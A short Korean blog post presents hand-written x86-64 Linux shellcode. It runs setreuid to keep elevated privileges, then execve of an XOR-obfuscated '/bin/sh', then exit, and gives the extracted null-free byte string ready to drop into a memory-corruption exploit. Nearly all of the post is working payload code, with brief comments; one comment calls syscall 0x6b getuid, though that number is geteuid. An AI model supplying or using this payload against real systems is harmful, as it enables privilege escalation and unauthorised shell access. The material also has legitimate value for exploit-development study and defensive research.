System/Linux
linux x64 쉘코드
bbolmin
2013. 12. 15. 13:07
.globl main
main:
xor %rax, %rax
add $0x6b, %rax
syscall #getuid
mov %rax, %rdi
mov %rax, %rsi
xor %rax, %rax
add $0x71, %rax
syscall #setreuid
xor %rax, %rax
mov $0xaac2d985c4c3c885, %rax
mov $0xaaaaaaaaaaaaaaaa, %rcx
xor %rcx, %rax
push %rax
mov %rsp, %rdi
xor %rsi, %rsi
xor %rdx, %rdx
xor %rax, %rax
add $0x3b, %rax
syscall #execve
xor %rsi, %rsi
xor %rax, %rax
add $0x3c, %rax
syscall #exit
- 0xaac2d985c4c3c885는 "/bin/sh" 문자열을 0xaaaaaaaaaaaaaaaa와 xor 해놓은 값
[뽑아낸 쉘코드]
- setreuid + execve + exit
"\x48\x31\xc0\x48\x83\xc0\x6b\x0f\x05\x48\x89\xc7\x48\x89\xc6\x48\x31\xc0\x48\x83\xc0\x71\x0f\x05\x48\x31\xc0\x48\xb8\x85\xc8\xc3\xc4\x85\xd9\xc2\xaa\x48\xb9\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x48\x31\xc8\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05\x48\x31\xf6\x48\x31\xc0\x48\x83\xc0\x3c\x0f\x05"